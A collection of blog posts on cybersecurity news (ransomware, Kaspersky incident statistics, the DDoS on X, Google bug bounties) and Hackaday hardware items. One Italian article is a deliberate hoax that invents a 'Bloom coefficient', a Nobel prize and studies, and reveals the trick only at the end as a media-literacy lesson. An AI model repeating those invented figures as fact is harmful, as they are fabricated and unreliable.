  • Implementare sistemi di Intrusion Prevention System (IPS) e Web Application Firewall (WAF) come protezione perimetrale a ridosso dei servizi esposti su internet.
  • Implementare una piattaforma di sicurezza XDR, nativamente automatizzata, possibilmente supportata da un servizio MDR 24 ore su 24, 7 giorni su 7, consentendo di raggiungere una protezione e una visibilità completa ed efficace su endpoint, utenti, reti e applicazioni, indipendentemente dalle risorse, dalle dimensioni del team o dalle competenze, fornendo altresì rilevamento, correlazione, analisi e risposta automatizzate.

Sia gli individui che le organizzazioni sono scoraggiati dal pagare il riscatto, in quanto anche dopo il pagamento le cyber gang possono non rilasciare la chiave di decrittazione oppure le operazioni di ripristino possono subire degli errori e delle inconsistenze.

La sicurezza informatica è una cosa seria e oggi può minare profondamente il business di una azienda.

Oggi occorre cambiare immediatamente mentalità e pensare alla cybersecurity come una parte integrante del business e non pensarci solo dopo che è avvenuto un incidente di sicurezza informatica.

L'articolo FUNKSEC rivendica un attacco Informatico All’Università di Modena e Reggio Emilia. Scopri i dettagli proviene da il blog della sicurezza informatica.


Some Useful Notes On The 6805-EC10 Addressable RGB LED


LEDs are getting smaller and smaller, and the newest generations of indexable RGB LEDs are even fiddlier to use than their already diminutive predecessors. [Alex Lorman] has written some notes about the minuscule SK6805-EC10 series of LEDs, which may be helpful to those wanting to learn how to deal with these in a more controlled manner.

Most hardware types will be very familiar with the 5050-sized devices, sold as Neopixels in some circles, which are so-named due to being physically 5.0 mm x 5.0 mm in the horizontal dimensions. Many LEDs are specified by this simple width by depth manner. As for addressable RGB LEDs (although not all addressable LEDs are RGB, there are many weird and wonderful combinations out there!) the next most common standard size down the scale is the 2020, also known as the ‘Dotstar.’ These are small enough to present a real soldering challenge, and getting a good placement result needs some real skills.

[Alex] wanted to use the even smaller EC10 or 1111 devices, which measure a staggering 1.1 mm x 1.1 mm! Adafruit’s product page mentions that these are not intended for hand soldering, but we bet you want to try! Anyway, [Alex] has created a KiCAD footprint and a handy test PCB for characterizing and getting used to handling these little suckers, which may help someone on their way. They note that hot air reflow soldering needs low temperature paste (this scribe recommends using MG Chemicals branded T3 Sn42Bi57Ag1 paste in this application) and a very low heat to avoid cracking the cases open. Also, a low air flow rate to prevent blowing them all over the desk would also be smart. Perhaps these are more suited to hot plate or a proper convection oven?

As a bonus, [Alex] has previously worked with the slightly larger SK6805-1515 device, with some good extra notes around an interesting nonlinearity effect and the required gamma correction to get good colour perception. We’ll leave that to you readers to dig into. Happy soldering!

We’ve not yet seen many projects using these 1111 LEDs, but here’s one we dug up using the larger 1515 unit.


hackaday.com/2025/03/12/some-u…


I2C Sniffing Comes to the Bus Pirate 5


While the Bus Pirate 5 is an impressive piece of hardware, the software is arguably where the project really shines. Creator [Ian Lesnet] and several members of the community are constantly working to add new features and capabilities to the hardware hacking multi-tool, to the point that if your firmware is more than a few days old there’s an excellent chance there’s a fresher build available for you to try out.

One of the biggest additions from the last week or so of development has been the I2C sniffer — a valuable tool for troubleshooting or reverse engineering devices using the popular communications protocol. [Ian] has posted a brief demo video of it in action.

It’s actually a capability that was available in the “classic” versions of the Bus Pirate, but rather than porting the feature over from the old firmware, [Ian] decided to fold the MIT licensed pico_i2c_sniffer from [Juan Schiavoni] into the new codebase. Thanks to the RP2040’s PIO, the sniffer works at up to 500 kHz, significantly outperforming its predecessor.

Admittedly, I2C sniffing isn’t anything you couldn’t do with a cheap logic analyzer. But that means dealing with captures and making sure the protocol decoder is setup properly, among other bits of software tedium. In comparison, once you start the sniffer program on the Bus Pirate 5, I2C data will be dumped out to the terminal in real-time for as long as you care to see it. For reverse engineering, it’s also very easy to move quickly from sniffing I2C packets to replaying or modifying them within the Bus Pirate’s interface.

If you already have a Bus Pirate 5, all you need to do is flash the latest firmware from the automated build system, and get sniffing. On the fence about picking one up? Perhaps our hands-on review will help change your mind.


hackaday.com/2025/03/12/i2c-sn…


Incident response analyst report 2024


Kaspersky provides rapid and fully informed incident response services to organizations, ensuring impact analysis and effective remediation. Our annual report shares anonymized data about the investigations carried out by the Kaspersky Global Emergency Response Team (GERT), as well as statistics and trends in targeted attacks, ransomware and adversaries’ tools that our experts observed throughout the year in real-life incidents that required both comprehensive IR unit support and consulting services aimed at assisting organizations’ in-house expert teams.

Download the full version of the report.

Regions and industries of incident response requests


In 2024, we saw the share of incident response requests rise in most of the regions, with the majority of investigations conducted in the CIS (50.6%), the Middle East (15.7%) and Europe (10.8%).

Geographic distribution of incident response requests, 2024
Geographic distribution of incident response requests, 2024

The distribution of IR requests by industry followed the 2023 pattern, keeping industrial (23.5%), government (16.3%) and financial (13.3%) organizations in the top three most targeted industries. However, this year, the majority of requests came from industrial enterprises, whereas the government agencies were targeted less often than in 2023. We also observe a growing tendency in incidents related to the transportation industry — the number of requests for IR services has doubled since 2023.

Distribution of organizations that requested IR assistance, by industry, 2024
Distribution of organizations that requested IR assistance, by industry, 2024

Key 2024 trends and statistics


In 2024, ransomware attacks saw an increase of 8.3 p.p. from the 2023 numbers and amounted to 41.6% of incidents overall. Our GERT experts estimate that ransomware will persist as the main threat to organizations worldwide in the upcoming year, continuing the trend of the recent years, as we observe this threat holding top positions among incidents in organizations. In the majority of infections, we encountered samples of the LockBit family (43.6%), followed by Babuk (9.1%) and Phobos (5.5%). Our investigations also revealed new ransomware families, such as ShrinkLocker and Ymir. What is more, GERT experts discovered noteworthy malicious campaigns like Tusk and a set of incidents with CVE-2023-48788 exploited.

Another alarming trend identified in real incident response cases is wider use of such tools as Mimikatz (21.8%) and PsExec (20.0%). They are commonly used during post-exploitation for password extraction and lateral movement. We also observe a strengthening tendency for data leakage to be the second most common reason for an incident response request, amounting to 16.9% of all incidents, which correlates with our assumptions regarding trends in credential access techniques.

Recommendations for preventing incidents


To protect your organization against cyberthreats and minimize the damage in the case of an attack, Kaspersky GERT experts recommend:

  • Implementing a strong password policy and using multi-factor authentication
  • Removing management ports from public access
  • Adopting secure development practices to prevent insecure code from reaching production environments
  • Establishing a zero-tolerance policy for patch management, or having compensation measures in place for public-facing applications
  • Ensuring that employees maintain a high level of security awareness
  • Implementing rules to detect utilities commonly used by adversaries
  • Conducting frequent, regular compromise assessment activities
  • Employing a security tool set that includes EDR-like telemetry
  • Constantly testing the security operations team’s response times with simulated attacks
  • Prohibiting the use of any software being used within the corporate network that is known to be used by attackers
  • Regularly backing up your data
  • Working with an Incident Response Retainer partner to address incidents with fast SLAs
  • Implementing strict security programs for applications that handle personal information
  • Implementing security access control over important data using DLP
  • Continuously training your incident response team to maintain their expertise and stay up-to-date with the evolving threat landscape

The full 2024 Incident Response Report features additional information about real-life incidents, including new threats discovered by Kaspersky experts. We also take a closer look at APT activities, providing statistics for the most prolific groups. The report includes comprehensive analysis of initial attack vectors in correlation with the MITRE ATT&CK tactics and techniques and the full list of vulnerabilities that we detected during incident response engagements.


securelist.com/kaspersky-incid…


Fake news: studio internazionale rivela che è tutta colpa dell’AI e dell’anonimato online


Il primo report dell’analisi condotta dal progetto McGuffin che ha coinvolto più di 23 Paesi attraverso una task force di indagine coordinata con università e centri studi specialistici, ha confermato un dato allarmante: con lo sviluppo dei LLM, l’allarme fake news è quanto mai attuale e richiede un intervento normativo per regolamentare l’utilizzo dell’Intelligenza Artificiale, l’accesso e la partecipazione ai social network. Uno dei fattori che suscita maggiore preoccupazione è l’anonimato online, che stando agli studi è strettamente correlato con la produzione e diffusione delle fake news.

Stando ai dati forniti, il coefficiente di Bloom – che è il principale parametro internazionale impiegato per analizzare la capacità di valutare la pericolosità di notizie false all’interno dei sistemi dei principali social network – fornisce infatti degli indicatori piuttosto allarmanti:

  • ha un valore medio fra 4 e 8 nei Paesi in cui l’utilizzo di social network e dei LLM è fortemente limitato;
  • ha un valore medio fra 15 e 16 nei Paesi in cui è diffuso l’utilizzo di social network ma non quello dei LLM;
  • ha un valore medio pari a 32 nei Paesi in cui social network e LLM sono diffusi, con picchi di 42 nelle ipotesi in cui è garantito l’anonimato online e non esiste una legislazione riguardante l’Intelligenza Artificiale.

Da un lato, è necessario regolamentare l’Intelligenza Artificiale con la previsione normativa di dover inserire parametri etici correttivi in cui sono valorizzate le notizie vere e vengono sfavorite le fake news. Questo però è un intervento che non si può dire sufficiente, motivo per cui sono stati richiamati gli studi di Smith, premiati con il Nobel per l’Informazione nel 1984, che hanno dimostrato una correlazione fra aumento del coefficiente di Bloom e diminuzione degli autori che optano per pubblicazioni a proprio nome scegliendo uno pseudonimo o l’anonimato.
Proiezione di Smith sulla correlazione fra aumento del coefficiente di Bloom e diminuzione degli autori identificabili nel tempo.
Questo dovrebbe indurre una riflessione: con le moderne tecnologie e i social network, quanto è ancora più allarmante la proiezione di Smith qualora venisse aggiornata? Ecco perché bisogna che l’anonimato online, soprattutto nei social network, sia ridotto al minimo indispensabile (ad es. solo per forze dell’ordine, moderatori o fact-checker ufficiali della piattaforma). Si deve prevedere comunque l’accesso con un’autenticazione fornita dallo Stato (ad es. tramite SpID).

Altrimenti, non sarà mai possibile garantire un ecosistema social sano e sicuro. Soprattutto per i minori, primi soggetti ad essere messi in pericolo dall’anonimato online.

Ecco dunque che si conferma così l’esigenza di un intervento normativo urgente a riguardo. Non basteranno pene severe non solo per chi diffonde fake news elaborate con l’Intelligenza Artificiali, ma si dovrà sanzionare anche chi si registra con falso nome ad un social network dal momento che questo è il presupposto di ogni attività illecita svolta all’interno della piattaforma.

Conclusioni: fake news e ruolo del lettore


Quali conclusioni trarre?

Che tutto quello che hai letto fino a questo momento è una fake-news!

E a pensarci bene: rileggendo il titolo, ora assume tutto un altro significato o no?

Inoltre il ruolo di chi legge la notizia è fondamentale! E deve continuare ad esserlo, perché soltanto la persona che approccia la notizia è l’ineliminabile fact-checker che applica liberamente il proprio pensiero critico, ricerca fonti, interpreta dati e valuta tanto il merito quanto il metodo. E legge per intero un articolo, arrivando fin qui. Dove rivelo il trucco e il gioco.

Un attento lettore avrebbe potuto facilmente rilevare tutte le incongruenze dell’articolo, nonché la mancanza di fonti riscontrabili. Questa non è stata altro che la dimostrazione pratica di come si può ingegnerizzare una fake news su un argomento particolarmente sentito. Come quello delle fake news, per l’appunto. Con una spolverata di Intelligenza Artificiale che fa tendenza. E l’odio indimostrato verso l’anonimato online, che invece è un presidio di libertà peraltro riconosciuto nel novero dei diritti fondamentali dell’Internet (“Dichiarazione dei diritti in Internet”, art. 10).

Una fake news dev’essere infatti allettante, stuzzicare bias cognitivi vari, assumere una parvenza di autorevolezza e presentare chissà quali realtà oggettive indimostrate, una semantica attentamente selezionata e così via. Tutti ingredienti ben noti che inducono a dispensare facendo leva sull’emotività e contando sulla diminuita capacità di pensiero critico.

Il cocktail è così un mescolato di indignazione, senso di pericolo e tutto ciò in cui vogliamo credere per operare soluzioni facili e che guarda caso viene comodamente offerto. Certo, senza rappresentarne il costo, che spesso è la compressione di diritti e libertà fondamentali. Per quanto inebriante sul momento, dà facili illusioni e un pessimo risveglio. Che fa sempre e comunque esperienza, meglio ancora se secondo un approccio di tipo lesson learned.

Confidando che le citazioni nerd abbiano reso più piacevole l’inganno (anzi: buona caccia di easter egg!), mi congedo con le parole del Bardo:

Se l’ombre nostre offeso v’hanno
Pensate, per rimediare al danno,
che qui vi abbia colto il sonno
durante la visione del racconto
e questa vana e sciocca trama
non sia nulla più di un sogno
Signori, non ci rimproverate,
Rimedieremo, se ci perdonate.

E, come è vero che son sincero,
Se solo avremo la fortuna di sfuggire ai vostri insulti,
a fare ammenda riusciremo.
O chiamatemi bugiardo se vi va!
Quindi buonanotte a tutti voi
Regalatemi un applauso, amici miei
E Puck a tutti i danni rimedierà


L'articolo Fake news: studio internazionale rivela che è tutta colpa dell’AI e dell’anonimato online proviene da il blog della sicurezza informatica.


Attacco a X: Scovato il Responsabile? Le Indagini Puntano in una Direzione Inattesa!


L’attacco informatico a X, il social network di Elon Musk, ha scatenato una vera e propria caccia ai responsabili. Dopo le dichiarazioni dello stesso Musk, che ha attribuito l’attacco a fonti ucraine, l’evento ha assunto una dimensione geopolitica rilevante, soprattutto considerando la recente riunione tra il presidente Volodymyr Zelensky e Donald Trump.
profilo su X di Dark Storm team

L’attacco e le sue conseguenze


L’attacco DDoS, attribuito al gruppo noto come “Dark Storm”, ha causato disservizi significativi sulla piattaforma X, con interruzioni intermittenti per diverse ore. Secondo alcuni esperti di cybersecurity, la tempistica dell’attacco potrebbe non essere casuale, avvenendo poco dopo l’incontro tra Zelensky e Trump, evento che potrebbe aver influenzato la strategia di attori legati all’ambito cyber.

La caccia ai responsabili


Dopo l’attacco, le community OSINT (Open Source Intelligence) e vari ricercatori indipendenti hanno iniziato a investigare sull’identità degli attori dietro Dark Storm. Un utente con il nome “lulagain“, attivo su forum del dark web, ha pubblicato un presunto leak con informazioni su uno dei membri del gruppo, includendo immagini e collegamenti a profili di X.

Uno dei post più rilevanti è apparso sulla piattaforma X dallo stesso ricercatore Baptiste Robert (@fs0c131y), il quale ha affermato di aver identificato i responsabili dell’attacco e di essere disponibile a discutere della questione direttamente con Elon Musk a Washington.

L’analisi OSINT condotta avrebbe portato all’individuazione di un possibile membro del gruppo, di cui sono state diffuse immagini nei forum underground e sui social media.
Post su breachForums che porta alla luce il tweet di @fs0c131y

Le implicazioni politiche e di sicurezza


L’attacco ha sollevato interrogativi sulla sicurezza della piattaforma X e sulla sua vulnerabilità a minacce informatiche. Inoltre, l’ipotesi di un coinvolgimento ucraino suggerito da Musk ha generato dibattiti sulle reali motivazioni dietro l’azione di Dark Storm. Si tratta di un gruppo indipendente o di un’operazione orchestrata in un contesto più ampio di cyber warfare?

Le indagini proseguono, e se le analisi OSINT si rivelassero corrette, potremmo presto assistere a ulteriori sviluppi sulla reale identità degli hacker dietro Dark Storm e sulle loro connessioni con attori statali o privati. Nel frattempo, la sicurezza di X rimane sotto osservazione, e il caso continua a far discutere l’opinione pubblica e gli esperti del settore.
Tweet di @fs0c131y che mostra la persona dietro all’attacco di X individuato dopo analisi OSINT

Conclusioni


L’attacco DDoS condotto da Dark Storm contro X rappresenta un chiaro esempio di come gli hacktivisti utilizzino strumenti pubblicamente accessibili, come Check-host.net, per dimostrare l’efficacia delle loro operazioni. La pubblicazione di prove su Telegram e Breach Forums evidenzia un modus operandi consolidato: colpire bersagli di alto profilo e rivendicare pubblicamente le azioni per ottenere visibilità e consenso all’interno delle loro comunità di riferimento.

La risposta di X, con l’attivazione della protezione Cloudflare per mitigare l’impatto degli attacchi, dimostra come le piattaforme digitali stiano adottando misure sempre più sofisticate per difendersi dalle minacce informatiche. L’introduzione di un sistema di captcha per filtrare traffico sospetto è una contromisura immediata ed efficace, ma solleva interrogativi sulla scalabilità e sulla fruibilità della piattaforma per gli utenti legittimi.

Questo episodio sottolinea ancora una volta la crescente importanza della cybersecurity nel panorama digitale odierno. Gli attacchi DDoS, sempre più utilizzati come strumento di protesta politica e di destabilizzazione, richiedono una continua evoluzione delle strategie difensive da parte delle aziende tecnologiche. Il caso Dark Storm vs X è solo l’ennesima dimostrazione di come la guerra informatica tra hacktivisti e grandi piattaforme sia destinata a proseguire, con nuove tattiche e contromisure in costante sviluppo.

L'articolo Attacco a X: Scovato il Responsabile? Le Indagini Puntano in una Direzione Inattesa! proviene da il blog della sicurezza informatica.


11,8 Milioni Di Dollari è la cifra record che Google da ai cacciatori di bug: ecco chi ha incassato di più!


Google ha dichiarato di aver pagato 11,8 milioni di dollari di ricompensa a 660 ricercatori di sicurezza nel 2024 per le vulnerabilità da loro scoperte.

Secondo l’azienda, dal lancio del primo Vulnerability Reward Program (VRP) nel 2010, Google ha pagato oltre 65 milioni di dollari in premi per bug ai ricercatori.

L’anno scorso, Google ha modificato il suo sistema di ricompense, offrendo ai ricercatori fino a 151.515 dollari nell’ambito di Google VRP e Cloud VRP, fino a 300.000 dollari nell’ambito di Mobile VRP e fino a 250.000 dollari per vulnerabilità critiche nel browser Chrome.

Di conseguenza, nel 2024, gli esperti che hanno segnalato vulnerabilità nelle app mobili di Android e Google hanno ricevuto 3,3 milioni di dollari e il numero di segnalazioni di errori critici e gravi è aumentato, sullo sfondo di una diminuzione del numero complessivo di bug.

Altri 137 ricercatori che hanno segnalato problemi in Chrome hanno ricevuto ricompense per un totale di 3,4 milioni di dollari. La ricompensa più alta era di 100.115 dollari, cifra pagata per aver scoperto un problema di bypass di MiraclePtr. Vale la pena notare che nell’agosto dell’anno scorso Google ha aumentato la ricompensa per chi ha aggirato MiraclePtr a 250.128 dollari.

Inoltre, dal lancio del programma bug bounty Cloud VRP nell’ottobre 2024, l’azienda ha ricevuto oltre 400 segnalazioni di vulnerabilità e ha pagato ai ricercatori oltre 500.000 dollari. L’azienda ha pagato più di 290.000 dollari per i problemi segnalati tramite il programma Abuse VRP.

Nell’ambito del programma bug bounty per la ricerca di errori nell’intelligenza artificiale, l’azienda ha ricevuto più di 150 segnalazioni da specialisti e alla fine ha pagato loro più di 55.000 dollari in ricompense.

Altri 370.000 dollari sono stati spesi in incentivi per due eventi bugSWAT. I cacciatori di bug che hanno partecipato al concorso volto a individuare problemi nei prodotti LLM hanno ricevuto più di 87.000 dollari.

L'articolo 11,8 Milioni Di Dollari è la cifra record che Google da ai cacciatori di bug: ecco chi ha incassato di più! proviene da il blog della sicurezza informatica.


Classy Paper Tape Reader Complements Homebrew Retrocomputer


If you were one of the earliest of early adopters in the home computing revolution, you might have had to settle for paper tape mass storage. It was slow, it was bulky, but it was what you had, and that gave it a certain charm that’s hard to resist. And that charm is what [Joshua Coleman] captures with this DIY paper tape reader build.

If the overall style of this project looks familiar, it’s because it was meant to echo the design themes from [Joshua]’s Coleman Z-80 modular computer. The electronics of the reader are based on [David Hansel]’s take on a paper tape reader, which in turn was meant to complement his Altair 8080 simulator — it’s retrocomputers all the way down! [Joshua]’s build has a few bells and whistles to set it apart, though, including an adjustable read head, parametric 3D-printed reels, and a panel mounted ammeter, just because. He also set it up to be a sort of keyboard wedge thanks to an internal relay that bypasses the reader unless it’s actually playing back a tape. Playback speed is pretty fast; see the video below for details.

So far, writing the tapes is an offline process. [Joshua] uses a Python program to convert ASCII to an SVG file and uses a laser cutter to burn holes in lengths of paper, which are then connected together to form a longer tape. A logical next step might be to build a feeder that moves a paper tape across the bed of the laser cutter in sync with the conversion program, to create continuous paper tapes. Or, there’s always the old-school route of solenoid-powered punch and die. We’d be thrilled with either.

youtube.com/embed/FqEwnl9ZPYk?…


hackaday.com/2025/03/11/classy…


Lies, Damned Lies, And IGBT Datasheets


We have all seen optimistic claims for electronic products which fail to match the reality, and [Electronic Wizard] is following one up in a recent video. Can a relatively small IGBT really switch 200 A as claimed by a dubious seller? Off to the datasheet to find out!

The device in question is from Toshiba, and comes in a TO-220 package. This itself makes us pause for a minute, because we suspect the pins on a TO220 would act more like fuses at a steady 200 A.

But in the datasheet, there it is, 200 A. Which would be great, but of course it turns out that this is the instantaneous maximum current for a few microsecond pulse. Even then it’s not finished, because while the continuous current is supposed to he half that, in the datasheet it specifies a junction temperature of 25 Celsius. The cooling rig required to maintain that whit this transistor passing 200 A would we think be a sight to behold, so for all intents and purposes this can’t even switch a continuous 100 A. The real figure is much less as you’d imagine, but it raises an important point. We blindly read datasheets and trust them, but sometimes we should engage brain before releasing the magic smoke.

youtube.com/embed/sIabnsGmGBY?…


hackaday.com/2025/03/11/lies-d…